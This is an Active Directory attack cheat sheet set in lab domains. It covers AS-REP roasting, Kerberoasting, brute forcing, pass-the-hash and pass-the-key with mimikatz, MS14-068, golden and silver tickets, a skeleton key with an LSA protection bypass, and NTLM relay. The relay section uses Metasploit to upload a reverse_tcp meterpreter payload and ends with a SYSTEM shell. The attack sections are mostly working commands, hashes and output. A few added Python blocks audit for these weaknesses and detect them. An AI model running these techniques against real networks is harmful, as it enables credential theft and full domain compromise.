Before doing any of this, you need at least one fully interactive shell. These notes assume a shell has already been obtained and elevated to nt authority\system.
AS-REP Roasting
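This is an attack technique against the Kerberos protocol that obtains a user's password hash without authenticating. If a user has "Do not require Kerberos preauthentication" enabled, an attacker can obtain the Kerberos AS-REP and then crack that credential offline.
First you need to know which users exist. kerbrute is used here to enumerate them; the target must have port 88 open.
The following project is required: https://github.com/ropnop/kerbrute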
kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt -t 20
Output like the following means usernames were enumerated:
2020/08/06 17:22:21 > Using KDC(s):
2020/08/06 17:22:21 > spookysec.local:88
2020/08/06 17:22:22 > [+] VALID USERNAME: james@spookysec.local
2020/08/06 17:22:26 > [+] VALID USERNAME: svc-admin@spookysec.local
2020/08/06 17:22:34 > [+] VALID USERNAME: James@spookysec.local
2020/08/06 17:22:36 > [+] VALID USERNAME: robin@spookysec.local
2020/08/06 17:23:04 > [+] VALID USERNAME: darkstar@spookysec.local
2020/08/06 17:23:18 > [+] VALID USERNAME: administrator@spookysec.local
2020/08/06 17:23:51 > [+] VALID USERNAME: backup@spookysec.local
Use GetNPUsers to request the user's Kerberos ticket. If the option is not enabled, it reports an error saying the flag is not set.
GetNPUsers.py spookysec.local/james
λ GetNPUsers.py spookysec.local/james -no-pass
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for james
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
If it is enabled, the ticket is displayed:
λ GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:a5c2252aa6fd31021c6b73ddf78790a0$4ca233e07269de808a3036ca9f1db6e9a611001682f8dfa433b8409ca87fcd5d604546cfdac46f2cbc86f60455f4779c839ede069e49fd0889edca6017952a5ea26c104ed985aa1c6b82b0f57171c340e743c9f8fe4aef06ace0dd800704024f8808effcd9c602322f4e73e4331914cc22ee2b74d7130ff2bf1f7f89b90d63428d65f655d522fe39adbb24bb0cc815f1e5fab5cefdd5fd4caa775b6712ee3ce99a1f9bb50598a7f77eddd133fdb6c70980154337078128854684bd017df86e0b9ba4769c3db16e7fa4fe702a2622029f6850c82eff7c690096d78f9694978600f5a00beb41cfae1c13b24c6b88cabb6d1f08
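Then crack the password with hashcat:
hashcat -m 18200 hashfile wordlist --force # hashfile is the name of the file that holds the hash
If you do not want to enumerate users first, GetNPUsers can check a user list directly; it is just somewhat slow.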
GetNPUsers.py spookysec.local/ -usersfile userlist.txt -dc-ip 10.10.50.231
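The results look like the following: users whose ticket can be obtained are printed directly, and the others are reported as not having the flag set.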
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:59726561a02eb64b0a108c63f1078db3$7866b1dce6fee28d5033ba1f7446e80f03d18649fed3f300aeb55b5fa7f1cdb09d5dcc7259d722e757ddaa305f64ca51b8f05d2740dff233aa3741b944913c2e96bd6767b2cb209f013cfa6b106c6a5a38c48a1fc48e695bfbdf74f21010689e0abd0cfc0a4f2565f08b7a6a4f3645fdee4dd1fedc0b0088cc0fade7e55ec58593c184deecfef267db0ab613f3661a665ce850284c8cfcd033cde5960959331a5fac4cd5f4eb537969614328c5740498fca8cf34d882f4465e78b85302b3b6304042f08e8fb7ecd386b1da5798d6189fe1056f5dc74be490492443b36d2c743090bad3a8970ee8b4b4e6c75eb11ee53fbbf1
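The flag behind the UF_DONT_REQUIRE_PREAUTH message above is a bit in each account's userAccountControl attribute, so the exposure can be audited from a directory export. The following is an added example, not code from the original page or from Impacket; the CSV layout, the account values and the function names are assumptions made for illustration.

```python
import csv
import io

# userAccountControl bits as documented by Microsoft
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000  # the flag GetNPUsers reports on

# Constructed sample export; the values are invented for this example
SAMPLE_EXPORT = """sAMAccountName,userAccountControl
james,512
svc-admin,4260352
backup,66048
old-svc,4194818
"""


def audit_preauth(export_text):
    """Return accounts with preauthentication disabled, enabled ones first."""
    findings = []
    for row in csv.DictReader(io.StringIO(export_text)):
        uac = int(row["userAccountControl"])
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        findings.append({
            "account": row["sAMAccountName"],
            "enabled": not uac & UF_ACCOUNTDISABLE,
            "password_never_expires": bool(uac & UF_DONT_EXPIRE_PASSWD),
        })
    return sorted(findings, key=lambda f: (not f["enabled"], f["account"]))


def parse_asrep(line):
    """Split '$krb5asrep$<etype>$<user>@<REALM>:<checksum>$<data>' into fields."""
    _, tag, etype, rest = line.strip().split("$", 3)
    if tag != "krb5asrep":
        raise ValueError("not an AS-REP hash line")
    principal, _blob = rest.split(":", 1)
    user, realm = principal.rsplit("@", 1)
    # etype 23 is RC4-HMAC, keyed directly by the account's NT hash
    return {"user": user, "realm": realm, "etype": int(etype)}


if __name__ == "__main__":
    for finding in audit_preauth(SAMPLE_EXPORT):
        print(finding)
    print(parse_asrep("$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:00aa$11bb"))
```

Every enabled account this returns should have the flag cleared or, where a legacy client really needs it, a long random password.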
Kerberoast
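Project used: https://github.com/nidem/kerberoast
When the Kerberos exchange with the TGS completes, a service ticket (ST) is returned; the ST is encrypted with the server side's password.
First look up the registered SPNs. SPN: service principal name, the unique identifier of a service instance.
setspn -Q */* # list all SPNs in the current domain
setspn -T de1ay.com -Q */* # list the SPNs in the de1ay.com domain
The format is: <service class>/<host name>:<port>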
CN=DC,OU=Domain Controllers,DC=de1ay,DC=com
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC.de1ay.com
ldap/DC.de1ay.com/ForestDnsZones.de1ay.com
ldap/DC.de1ay.com/DomainDnsZones.de1ay.com
TERMSRV/DC
TERMSRV/DC.de1ay.com
DNS/DC.de1ay.com
GC/DC.de1ay.com/de1ay.com
RestrictedKrbHost/DC.de1ay.com
RestrictedKrbHost/DC
RPC/3f0c65bc-e5d1-472f-a826-bca6be17b380._msdcs.de1ay.com
HOST/DC/DE1AY
HOST/DC.de1ay.com/DE1AY
HOST/DC
HOST/DC.de1ay.com
HOST/DC.de1ay.com/de1ay.com
E3514235-4B06-11D1-AB04-00C04FC2DCD2/3f0c65bc-e5d1-472f-a826-bca6be17b380/de1ay.com
ldap/DC/DE1AY
ldap/3f0c65bc-e5d1-472f-a826-bca6be17b380._msdcs.de1ay.com
ldap/DC.de1ay.com/DE1AY
ldap/DC
ldap/DC.de1ay.com
ldap/DC.de1ay.com/de1ay.com
CN=krbtgt,CN=Users,DC=de1ay,DC=com
kadmin/changepw
CN=PC,CN=Computers,DC=de1ay,DC=com
TERMSRV/PC
TERMSRV/PC.de1ay.com
RestrictedKrbHost/PC
HOST/PC
RestrictedKrbHost/PC.de1ay.com
HOST/PC.de1ay.com
CN=WEB,CN=Computers,DC=de1ay,DC=com
WSMAN/WEB
WSMAN/WEB.de1ay.com
TERMSRV/WEB
TERMSRV/WEB.de1ay.com
RestrictedKrbHost/WEB
HOST/WEB
RestrictedKrbHost/WEB.de1ay.com
HOST/WEB.de1ay.com
发现存在 SPN!
Before cracking, however, check whether the encryption type is RC4; the SPNs above use AES. Use klist to check:
#3> 客户端: DE1AY @ DE1AY.COM
服务器: kadmin/changepw @ DE1AY.COM
Kerberos 票证加密类型: AES-256-CTS-HMAC-SHA1-96
票证标志 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
开始时间: 8/6/2020 14:52:35 (本地)
结束时间: 8/6/2020 14:54:35 (本地)
续订时间: 8/6/2020 14:54:35 (本地)
会话密钥类型: AES-256-CTS-HMAC-SHA1-96
If the encryption is RC4, the tickets can be exported with mimikatz and cracked offline:
kerberos::list /export
After exporting, crack the ticket with the script and a wordlist:
./tgsrepcrack.py wordlist.txt xxx-MYDOMAIN.LOCAL.kirbi
If mimikatz is not convenient to use, a PowerShell script can instead export hashcat-format strings that can be cracked offline directly:
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation
Then run hashcat:
hashcat64.exe -m 13100 hash.txt pass.txt
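The RC4 requirement noted above is also the detection handle: on the domain controller, Event ID 4769 records the encryption type of every service ticket issued. The following is an added example, not code from the original page or from any of the tools it uses; the key=value rendering of the events, the service account names and the threshold are assumptions.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the ticket type the cracking step on this page needs

# Constructed 4769/4768 records; field names follow the Windows event schema,
# the one-line key=value layout is an assumption of this example
SAMPLE_EVENTS = """\
EventID=4769 TargetUserName=de1ay@DE1AY.COM ServiceName=WEB$ TicketEncryptionType=0x12 IpAddress=10.10.10.201
EventID=4769 TargetUserName=de1ay@DE1AY.COM ServiceName=svc-sql TicketEncryptionType=0x17 IpAddress=10.10.10.201
EventID=4769 TargetUserName=de1ay@DE1AY.COM ServiceName=svc-web TicketEncryptionType=0x17 IpAddress=10.10.10.201
EventID=4769 TargetUserName=de1ay@DE1AY.COM ServiceName=svc-backup TicketEncryptionType=0x17 IpAddress=10.10.10.201
EventID=4769 TargetUserName=report-app@DE1AY.COM ServiceName=svc-sql TicketEncryptionType=0x17 IpAddress=10.10.10.80
EventID=4768 TargetUserName=de1ay ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.10.201
"""


def parse_event(line):
    """Turn one 'key=value key=value' record into a dict."""
    return dict(field.split("=", 1) for field in line.split())


def find_kerberoast_candidates(log_text, min_services=3):
    """Map (requester, source) to the user-account services requested with RC4."""
    requested = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        if event.get("EventID") != "4769":
            continue
        service = event["ServiceName"]
        # Machine accounts and krbtgt have random keys; they are not the risk here
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        if int(event["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        requested[(event["TargetUserName"], event["IpAddress"])].add(service)
    return {who: sorted(services) for who, services in requested.items()
            if len(services) >= min_services}


if __name__ == "__main__":
    for who, services in find_kerberoast_candidates(SAMPLE_EVENTS).items():
        print(who, services)
```

A single application legitimately requesting one RC4 ticket stays below the threshold; one account collecting RC4 tickets for several service accounts does not.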
Bruteforcing
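Brute-force enumeration of accounts and passwords. The operations available are:
- Enumerate valid usernames
- Enumerate usernames and passwords
- Find users that do not have preauthentication enabled
Project used: https://github.com/TarlogicSecurity/kerbrute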
./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com
Pay attention to the number of failed password attempts and the account policy.
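Guessing that is spread across many accounts stays under a per-account lockout threshold, so on the defending side it is more useful to count distinct accounts per source than failures per account. The following is an added example, not code from the original page or from kerbrute; it assumes domain controller events 4768 and 4771 rendered as key=value lines, and the source addresses and threshold are constructed.

```python
from collections import defaultdict

KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6  # unknown user name, the error shown on this page
KDC_ERR_PREAUTH_FAILED = 0x18      # wrong password

# Constructed records; field names follow the Windows event schema
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=alice Status=0x6 IpAddress=10.10.50.99
EventID=4768 TargetUserName=bob Status=0x6 IpAddress=10.10.50.99
EventID=4768 TargetUserName=carol Status=0x6 IpAddress=10.10.50.99
EventID=4768 TargetUserName=james Status=0x0 IpAddress=10.10.50.99
EventID=4771 TargetUserName=james Status=0x18 IpAddress=10.10.50.99
EventID=4771 TargetUserName=robin Status=0x18 IpAddress=10.10.50.99
EventID=4771 TargetUserName=backup Status=0x18 IpAddress=10.10.50.99
EventID=4771 TargetUserName=james Status=0x18 IpAddress=10.10.50.20
"""


def classify_sources(log_text, min_names=3):
    """Tag each source address that fails against many distinct names."""
    unknown = defaultdict(set)  # source -> names the KDC did not know
    bad_password = defaultdict(set)  # source -> accounts with failed pre-auth
    for line in log_text.splitlines():
        event = dict(field.split("=", 1) for field in line.split())
        if not event:
            continue
        status = int(event.get("Status", "0x0"), 16)
        source = event.get("IpAddress")
        name = event.get("TargetUserName", "").lower()
        if event.get("EventID") == "4768" and status == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[source].add(name)
        elif event.get("EventID") == "4771" and status == KDC_ERR_PREAUTH_FAILED:
            bad_password[source].add(name)
    verdicts = {}
    for source in set(unknown) | set(bad_password):
        tags = []
        if len(unknown[source]) >= min_names:
            tags.append("username-enumeration")
        if len(bad_password[source]) >= min_names:
            tags.append("password-guessing")
        if tags:
            verdicts[source] = tags
    return verdicts


if __name__ == "__main__":
    print(classify_sources(SAMPLE_EVENTS))
```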
PTK
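This technique is similar to PTH, except that once patch KB2871997 is installed, PTH is restricted to the Administrator account. In that situation an AES key can still be used for lateral movement.
Obtain the account's AES key: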
mimikatz "privilege::debug" "sekurlsa::ekeys"
Part of the result follows. Because the user stores the password in cleartext, what is shown below is a Windows service in session 0:
* Username : web$
* Domain : DE1AY.COM
* Key List :
aes256_hmac 8d7822f543e35904f6e28a0d6f270c3b7902de70296d669354157dd33813392e
aes128_hmac 80a6938c9463a8e5195a5874966ac229
rc4_hmac_nt 0a147850da3b3c41b055628a202d2b4a
rc4_hmac_old 0a147850da3b3c41b055628a202d2b4a
rc4_md4 0a147850da3b3c41b055628a202d2b4a
rc4_hmac_nt_exp 0a147850da3b3c41b055628a202d2b4a
rc4_hmac_old_exp 0a147850da3b3c41b055628a202d2b4a
Then inject the AES key:
mimikatz "privilege::debug" "sekurlsa::pth /user:web$ /domain:DE1AY.COM /aes256:8d7822f543e35904f6e28a0d6f270c3b7902de70296d669354157dd33813392e"
PTH
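Pass the hash: no cleartext password is needed to log in, because the NTLM hash can be used directly. An attacker can access remote hosts or services directly with the LM hash and NTLM hash. First check whether patch KB2871997 is installed.
First obtain the hash with mimikatz: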
privilege::debug
sekurlsa::logonpasswords
Part of the information obtained is shown below:
Session : Interactive from 1
User Name : de1ay
Domain : DE1AY
Logon Server : DC
Logon Time : 2020/8/7 16:20:47
SID : S-1-5-21-2756371121-2868759905-3853650604-1001
msv : [00000003] Primary
* Username : de1ay
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
After obtaining the hash, run PTH; remote hosts can then be accessed directly with this account's credentials.
sekurlsa::pth /user:de1ay /domain:DE1AY /ntlm:161cff084477fe596a5db81874498a24
The hash can also be brute-forced directly, for example with hashcat:
hashcat -m 1000 161cff084477fe596a5db81874498a24 password.dict -o out.txt --force
Use crackmapexec for batch pass the hash:
https://github.com/byt3bl33d3r/CrackMapExec
crackmapexec 192.168.120.0/24 -u de1ay -H 161cff084477fe596a5db81874498a24
PTT
Pass the ticket: a method that uses Kerberos tickets in place of a cleartext password or NTLM hash.
ms14-068
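This vulnerability allows any ordinary user to be elevated to domain administrator (Domain Admin); the corresponding patch is KB3011780.
It requires domain user privileges and local machine account privileges. First, use the domain user's privileges to get the domain user's SID: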
whoami /all
用户名 SID
=========== ==============================================
de1ay\de1ay S-1-5-21-2756371121-2868759905-3853650604-1001
Use the exploit to generate a ticket cache: https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
C:\bea>MS14-068.exe -u de1ay@de1ay.com -s S-1-5-21-2756371121-2868759905-3853650604-1001 -d dc.de1ay.com -p 1qaz@WSX
[+] Building AS-REQ for dc.de1ay.com... Done!
[+] Sending AS-REQ to dc.de1ay.com... Done!
[+] Receiving AS-REP from dc.de1ay.com... Done!
[+] Parsing AS-REP from dc.de1ay.com... Done!
[+] Building TGS-REQ for dc.de1ay.com... Done!
[+] Sending TGS-REQ to dc.de1ay.com... Done!
[+] Receiving TGS-REP from dc.de1ay.com... Done!
[+] Parsing TGS-REP from dc.de1ay.com... Done!
[+] Creating ccache file 'TGT_de1ay@de1ay.com.ccache'... Done!
This generates the ticket file TGT_de1ay@de1ay.com.ccache. Inject it into memory with mimikatz, purging the existing tickets first so that the write does not fail:
kerberos::list
kerberos::purge //purge existing tickets
kerberos::ptc TGT_de1ay@de1ay.com.ccache
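If Injecting ticket : OK is displayed, the injection succeeded.
Use kerberos::list to see the injected ticket.
Golden ticket
A golden ticket is a TGT that you generate yourself. When a TGT is generated, the user, domain, privilege and other information is encrypted with the hash of the krbtgt account, so with the user, domain, SID and the krbtgt hash a golden ticket can be generated. The resulting ticket is a domain admin account, that is, it can control the whole domain.
The krbtgt account normally exists only on domain controllers, so domain controller privileges are generally required. First export the krbtgt user's hash: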
privilege::debug
lsadump::lsa /patch # get the user hashes and the domain SID
After getting the hash, forge a user with mimikatz, for example the domain administrator account administrator:
kerberos::golden /domain:de1ay.com /sid:sid /krbtgt:hash /user:administrator /ticket:admin.kirbi
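Then import the ticket with mimikatz:
kerberos::ptt admin.kirbi
klist can be used to check whether the ticket was imported successfully.
Silver ticket
Silver ticket forgery uses the third step of Kerberos authentication: the client presents a ticket to a service on the server, and if validation passes it can access that service on the server.
Domain controller privileges are still required. Run the following on the domain controller: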
privilege::debug
sekurlsa::logonpasswords
Take the domain SID and NTLM hash from the output, then generate the ticket with mimikatz:
kerberos::golden /domain:de1ay.com /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:192.168.3.21 /rc4:8432d4fa4430ecf56927dbabd1b4d36b /service:cifs /user:de1ay /ptt
The ticket generated above is for the cifs service and gives access to the domain controller's file shares.
skeleton key
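A skeleton key adds the same password for every user in the domain: any domain user can authenticate with it, while the original passwords still work. It works by injecting into lsass.exe, so it is lost after a reboot.
First install the skeleton key on the domain controller; the following is run on the domain controller: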
privilege::debug
misc::skeleton
You get a series of OKs; then use the command below for access. The password created is mimikatz.
net use \\dc.de1ay.com mimikatz /user:web\de1ay.com
Because Microsoft added LSA Protection to prevent injection into lsass, the above applies to these systems:
Windows 8.1
Windows Server 2012 R2
Later mimikatz added support for a bypass, used together with mimidrv.sys:
privilege::debug
!+
!processprotect /process:lsass.exe /remove
misc::skeleton
This technique is not privilege escalation; it only amounts to adding a new universal password.
Relay Hash
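The target machine must not have SMB signing enabled, otherwise the technique does not work. In general, Windows Server enables it by default, while standalone Windows systems do not.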
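Whether a server enforces signing is visible in the SecurityMode field of its SMB2 NEGOTIATE response, which makes the precondition above auditable across an inventory. The following is an added example, not code from the original page or from the tools it uses; the sample responses are constructed and truncated to the fields the check reads, and the function names are assumptions.

```python
import struct

# SecurityMode bits in the SMB2 NEGOTIATE response
SMB2_SIGNING_ENABLED = 0x0001
SMB2_SIGNING_REQUIRED = 0x0002


def signing_mode(response):
    """Classify an SMB2 NEGOTIATE response (64-byte header + body, no framing)."""
    if len(response) < 68 or response[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    (command,) = struct.unpack_from("<H", response, 12)
    if command != 0x0000:
        raise ValueError("not a NEGOTIATE response")
    struct_size, security_mode = struct.unpack_from("<HH", response, 64)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response size")
    if security_mode & SMB2_SIGNING_REQUIRED:
        return "required"
    if security_mode & SMB2_SIGNING_ENABLED:
        return "enabled-not-required"
    return "disabled"


def relay_exposed(responses):
    """Return the hosts whose SMB server does not require signing."""
    return sorted(host for host, raw in responses.items()
                  if signing_mode(raw) != "required")


def build_sample(security_mode):
    """Constructed response: header plus StructureSize and SecurityMode only."""
    header = b"\xfeSMB" + struct.pack("<HHIH", 64, 0, 0, 0) + bytes(50)
    return header + struct.pack("<HH", 65, security_mode)


# Constructed inventory; host names follow the lab on this page, modes are invented
SAMPLE = {
    "DC.de1ay.com": build_sample(0x0003),
    "WEB.de1ay.com": build_sample(0x0001),
    "PC.de1ay.com": build_sample(0x0001),
}

if __name__ == "__main__":
    print(relay_exposed(SAMPLE))
```

Hosts reported here are the ones where requiring signing by policy removes the relay path described in this section.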
Inveigh
Script used: https://github.com/Kevin-Robertson/Inveigh
Run the following first. It must be run in an elevated session, otherwise it cannot listen:
Import-Module .\Inveigh.psd1
Invoke-Inveigh -consoleoutput Y
When other hosts connect, the console shows the host's NTLM hash:
[+] [2020-08-11T16:14:30] SMB(445) NTLM challenge 123B1B44BE03722D sent to 10.10.10.201:65312
[+] [2020-08-11T16:14:30] SMB(445) NTLMv2 captured for DE1AY\de1ay from 10.10.10.201(PC):65312:
de1ay::DE1AY::1812B95C562D1DA8C8D033B9F3C259A5:010100000000000096643A70B76FD601D1A5312DF1DFFF35000000310041005900010004004400430004001200640065003100610079002E0063006F006D0003001800440043002E0064006500306F006D0005001200640065003100610079002E0063006F006D000700080096643A70B76FD601060004000200000008003000000000002000007D481BA03B1FB135F248854DE1855E7B7D84F8369E2277395D330602A13038970A001000000000000000000900200063006900660073002F00310030002E00310030002E00310030002E0031003000000000000000000000000000
[+] [2020-08-11T16:14:31] NBNS request for TCONF.F.360.CN<00> received from 10.10.10.201[spoofer dis
To make use of the hash, https://github.com/Kevin-Robertson/Invoke-TheHash can be used:
Import-Module .\Invoke-TheHash.ps1
Invoke-WMIExec -Target 192.168.30.152 -Domain de1ay.com -Username de1ay -Hash 1812B95C562D1DA8C8D033B9F3C259A5 -Command "whoami" -verbose
smbrelayx
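Use smbrelayx.py from impacket to carry out the relay attack.
python smbrelayx.py -h 192.168.120.140 # the IP is the host you want to gain access to
If a host connects to the address running the relay, for example 192.168.120.130: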
net use \\192.168.120.130\c$ /user:"DE1AY\de1ay" "1qaz@WSX"
If the capture succeeds, you see the following:
[*] SMBD: Received connection from 192.168.120.142, attacking target 192.168.120.140
[*] Authenticating against 192.168.120.140 as DE1AY\de1ay SUCCEED
[*] de1ay::DE1AY:b937bb0942684e01:15bf5db54f019b8f52141375eeea221e:
[*] Sending status code STATUS_SUCCESS after authentication to 192.168.120.142
[-] TreeConnectAndX not found C$
If privileges are sufficient, the hashes on host 192.168.120.140 can be dumped. Use the hash to execute a command:
python smbrelayx.py -h 192.168.120.140 -c whoami
After running it, the command is executed:
[*] Starting service RemoteRegistry
[*] HTTPD: Received connection from 192.168.120.142, attacking target 192.168.120.140
[*] Authenticating against 192.168.120.140 as DE1AY\administrator SUCCEED
[*] administrator::DE1AY:0e7c6d90b614dbe7:a4061e0695772bfca50b692e5c92a1d7:
[-] 192.168.120.140 is being attacker at the moment, skipping..
[*] Executed specified command on host: 192.168.120.140
nt authority\system
Responder
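Responder sets up several rogue daemons (SQL server, FTP, HTTP, SMB server and so on) to prompt for credentials directly or to simulate the challenge-response authentication process and capture the hashes the client sends.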
python Responder.py -I eth0 wrp
When an SMB access request is made, it is captured:
[*] [LLMNR] Poisoned answer sent to 192.168.120.142 for name wpad
[HTTP] NTLMv2 Client : 192.168.120.142
[HTTP] NTLMv2 Username : DE1AY\de1ay
[HTTP] NTLMv2 Hash : de1ay::DE1AY:59e4691da47e5fe
To make use of it, the script mentioned above can be used: https://github.com/Kevin-Robertson/Invoke-TheHash
msfrelay
It is run roughly as follows:
msf5 > use exploit/windows/smb/smb_relay
msf5 exploit(windows/smb/smb_relay) > show options
Module options (exploit/windows/smb/smb_relay):
Name Current Setting Required Description
---- --------------- -------- -----------
SHARE ADMIN$ yes The share to connect to
SMBHOST no The target SMB server (leave empty for originating system)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 445 yes The local port to listen on.
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/smb_relay) > set smbhost 192.168.120.140
smbhost => 192.168.120.140
msf5 exploit(windows/smb/smb_relay) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/smb_relay) > set lhost 192.168.120.130
lhost => 192.168.120.130
msf5 exploit(windows/smb/smb_relay) > set lport 8855
lport => 8855
msf5 exploit(windows/smb/smb_relay) > show options
Module options (exploit/windows/smb/smb_relay):
Name Current Setting Required Description
---- --------------- -------- -----------
SHARE ADMIN$ yes The share to connect to
SMBHOST 192.168.120.140 no The target SMB server (leave empty for originating system)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 445 yes The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.120.130 yes The listen address (an interface may be specified)
LPORT 8855 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/smb_relay) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.120.130:8855
[*] Started service listener on 0.0.0.0:445
[*] Server started.
When an SMB connection comes in:
C:\Users\de1ay.DE1AY>net use \\192.168.120.130\c$ /user:"DE1AY\administrator" "1qaz@WSX"
the following happens:
msf5 exploit(windows/smb/smb_relay) > [*] Sending NTLMSSP NEGOTIATE to 192.168.120.140
[*] Extracting NTLMSSP CHALLENGE from 192.168.120.140
[*] Forwarding the NTLMSSP CHALLENGE to 192.168.120.142:53508
[*] Extracting the NTLMSSP AUTH resolution from 192.168.120.142:53508, and sending Logon Failure response
[*] Forwarding the NTLMSSP AUTH resolution to 192.168.120.140
[+] SMB auth relay against 192.168.120.140 succeeded
[*] Connecting to the defined share...
[*] Regenerating the payload...
[*] Uploading payload...
[*] Created \QsYUxAsk.exe...
[*] Connecting to the Service Control Manager...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \QsYUxAsk.exe...
[*] Sending stage (180291 bytes) to 192.168.120.140
List the sessions; one session has been established:
msf5 exploit(windows/smb/smb_relay) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WEB 192.168.120.130:8855 -> 192.168.120.140:54330 (192.168.120.140)